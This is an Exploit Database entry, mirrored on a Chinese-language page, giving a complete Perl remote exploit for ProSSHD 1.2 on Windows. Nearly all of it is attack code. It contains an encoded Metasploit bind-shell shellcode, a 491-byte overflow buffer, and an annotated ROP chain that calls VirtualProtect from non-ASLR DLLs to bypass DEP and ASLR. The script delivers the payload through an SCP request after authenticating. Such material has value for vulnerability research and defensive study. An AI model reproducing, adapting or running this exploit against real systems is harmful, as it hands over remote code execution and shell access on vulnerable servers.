ProSSHD 1.2 – (Authenticated) Remote (ASLR + DEP Bypass)

• Exploit Database
• 103 阅读

• 作者： Alexey Sintsov
  日期： 2010-05-03
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12495/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170

  # Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass) # Date: 03.05.2010 # Author: Alexey Sintsov # Version: 1.2 # Tested on: Windows XP SP3 / Windows 7 # CVE : # Code :   ################################################################################ # Original exploit by S2 Crew [Hungary] # * * * # ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com] # * * * # Tested on:ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all # # Special for XAKEP magazine[www.xakep.ru] # # # CVE: -   #!/usr/bin/perl   use Net::SSH2;   $username = ''; $password = '';   $host = '192.168.126.129';#Remote host #$host = '192.168.13.6'; $port = 22;     # windows/shell_bind_tcp - 368 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=, # AutoRunScript= $shell = "\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" . "\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" . "\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" . "\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" . "\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" . "\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" . "\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" . "\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" . "\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" . "\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" . "\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" . "\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" . "\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" . "\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" . "\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" . "\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" . "\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" . "\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" . "\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" . "\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" . "\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" . "\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" . "\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" . "\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" . "\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" . "\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" . "\x38\x1e\x51\xde";       $fuzz = "\x41"x491 .# buffer before RET addr rewriting   ############################### ROP # All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL # For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL) # this make stack executable:   #### RET rewrite### "\x9F\x07\x37\x7C".# MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset   "\x11\x11\x11\x11".# JUNK---------------^^^ ^^^ "\x22\x22\x22\x22".# JUNK-------------------------^^^ "\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10 "\x33\x33\x33\x33".# JUNK------------------------------^^^   "\xC1\x4C\x34\x7C".# POP EAX/ RETN # ^^^ "\x33\x33\x33\x33".# ^^^ "\x33\x33\x33\x33".# ^^^ "\x33\x33\x33\x33".# ^^^ "\x33\x33\x33\x33".# ^^^ # ^^^ "\xC0\xFF\xFF\xFF".# ----^^^Param for next instruction... "\x05\x1e\x35\x7C".# NEG EAX /RETN ; EAX will be 0x40 (param for VirtualProtect)   "\xc8\x03\x35\x7C".# MOV DS:[ECX], EAX / RETN; save 0x40 (3 param) "\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX   "\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; EAX=ECX-0x0c   "\x08\x94\x16\x7C".# MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)   "\xB9\x1F\x34\x7C".# INC EAX / RETN ; oh ... and move pointer back "\xB9\x1F\x34\x7C".# INC EAX / RETN "\xB9\x1F\x34\x7C".# INC EAX / RETN "\xB9\x1F\x34\x7C".# INC EAX / RETN ; EAX=ECX=0x8   "\xB2\x01\x15\x7C".# MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)   "\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position for output from VirtualProtect "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN "\xA1\x1D\x34\x7C".# DEC EAX/ RETN   "\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10 "\x33\x33\x33\x33".# JUNK------------------------------^^^   "\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX # "\x33\x33\x33\x33".# "\x33\x33\x33\x33".# "\x33\x33\x33\x33".# "\x33\x33\x33\x33".#   "\xB9\x1F\x34\x7C".# INC EAX / RETN ; and again... "\xB9\x1F\x34\x7C".# INC EAX / RETN "\xB9\x1F\x34\x7C".# INC EAX / RETN "\xB9\x1F\x34\x7C".# INC EAX / RETN   "\xE5\x6B\x36\x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)   "\xBA\x1F\x34\x7C"x204 . # RETN fill.....   "\xDD\x28\x35\x7C".# CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN;Call VirtualProtect "AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect)   ####################### retrun into stack after VirtualProtect "\x1A\xF2\x35\x7C". # ADD ESP, 0xC / RETN; take next ret "XXXYYYZZZ123". # trash "\x30\x5C\x34\x7C". # 0x7c345c2e: ANDPS XMM0, XMM3-- (+0x2 to address and....)--> PUSH ESP / RETN ; EIP=ESP   "\x90"x14 . # NOPs here is the begining of shellcode   $shell; # shellcode 8)   $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; $ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; #sleep(10); $scpget = $ssh2->scp_get($fuzz); $ssh2->disconnect();